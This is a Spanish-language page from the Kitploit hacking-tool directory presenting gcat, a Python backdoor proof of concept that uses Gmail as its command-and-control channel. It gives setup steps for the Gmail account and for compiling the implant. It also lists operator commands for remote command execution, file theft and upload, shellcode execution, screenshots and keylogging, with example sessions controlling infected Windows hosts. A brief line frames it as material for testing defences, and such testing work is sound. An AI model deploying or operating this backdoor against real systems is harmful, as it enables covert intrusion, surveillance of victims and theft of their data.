Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
gcat — Un backdoor PoC que utiliza Gmail como servidor C&C | Kitploit
Herramientas/GitHubGitHub/byt3bl33d3r/gcat
ExplotaciónPost-ExplotaciónPruebas de PenetraciónComando y ControlRed TeamingDesarrollo de PayloadsTroyano de Acceso RemotoArchived
GitHubbyt3bl33d3r/gcat

gcat

Un backdoor PoC que utiliza Gmail como servidor C&C

Ver Repositorio
1.4k416hace 7 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Gcat

Un backdoor sigiloso basado en Python que utiliza Gmail como servidor de comando y control

Este proyecto se inspiró en el código PoC original de Benjamin Donnelly

Esto es código PoC...

... que se publicó para que las organizaciones prueben sus defensas contra este tipo de ataques. Para detectarlos, consulta proyectos como RITA.

Para una versión más actualizada y mantenida de este proyecto, consulta GDog

Configuración

Para que esto funcione, necesitas:

  • Una cuenta de Gmail (¡Usa una cuenta dedicada! ¡No uses tu cuenta personal!)
  • Activa "Permitir aplicaciones menos seguras" en la configuración de seguridad de la cuenta
  • También es posible que tengas que habilitar IMAP en la configuración de la cuenta

Este repositorio contiene dos archivos:

  • gcat.py un script que se utiliza para enumerar y enviar comandos a los clientes disponibles
  • implant.py el backdoor real a desplegar

En ambos archivos, edita las variables gmail_user y gmail_pwd con el nombre de usuario y la contraseña de la cuenta que configuraste anteriormente.

Probablemente querrás compilar implant.py en un ejecutable usando Pyinstaller

Nota: Se recomienda compilar implant.py usando una instalación de Python de 32 bits

Uso

root@kitploit:~
                                             dP   
                                             88   
                .d8888b. .d8888b. .d8888b. d8888P 
                88'  `88 88'  `"" 88'  `88   88   
                88.  .88 88.  ... 88.  .88   88   
                `8888P88 `88888P' `88888P8   dP   
                     .88                          
                 d8888P  
                     

                   .__....._             _.....__,
                     ". : o :':         ;': o :".
                     `. `-' .'.       .'. `-' .'   
                       `---'             `---'  

             _...----...      ...   ...      ...----..._
          .-'__..-''----    `.  `"`  .'    ----'''-..__`-.
         '.-'   _.--'''       `-._.-'       ''''--._   `-.`
         '  .-"'                  :                  `"-.  `
           '   `.              _.'"'._              .'   `
                 `.       ,.-'"       "'-.,       .'
                   `.                           .'
              jgs    `-._                   _.-'
                         `"'--...___...--'"`

                     ...IM IN YUR COMPUTERZ...

                        WATCHIN YUR SCREENZ

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -id ID                Client to target
  -jobid JOBID          Job id to retrieve

  -list                 List available clients
  -info                 Retrieve info on specified client

Commands:
  Commands to execute on an implant

  -cmd CMD              Execute a system command
  -download PATH        Download a file from a clients system
  -upload SRC DST       Upload a file to the clients system
  -exec-shellcode FILE  Execute supplied shellcode on a client
  -screenshot           Take a screenshot
  -lock-screen          Lock the clients screen
  -force-checkin        Force a check in
  -start-keylogger      Start keylogger
  -stop-keylogger       Stop keylogger

Meow!

  • Una vez que hayas desplegado el backdoor en un par de sistemas, puedes verificar los clientes disponibles usando el comando list:
root@kitploit:~
#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86

La salida es una cadena UUID que identifica de forma única el sistema y el sistema operativo en el que se está ejecutando el implant.

  • Enviemos un comando a un implant:
root@kitploit:~
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv

Aquí le estamos diciendo a 90b2cd83-cb36-52de-84ee-99db6ff41a11 que ejecute ipconfig /all; el script luego genera el jobid que podemos usar para recuperar la salida de ese comando

  • ¡Veamos los resultados!
root@kitploit:~
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv     
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'


Windows IP Configuration

        Host Name . . . . . . . . . . . . : unknown-2d44b52
        Primary Dns Suffix  . . . . . . . : 
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No

-- SNIP --
  • ¡Eso es lo esencial! Pero puedes hacer mucho más, como puedes ver en el uso del script. ;)

Por hacer

  • Soporte multiplataforma
  • Comando para subir archivos
  • Cifrado de transporte y ofuscación
Descargar herramienta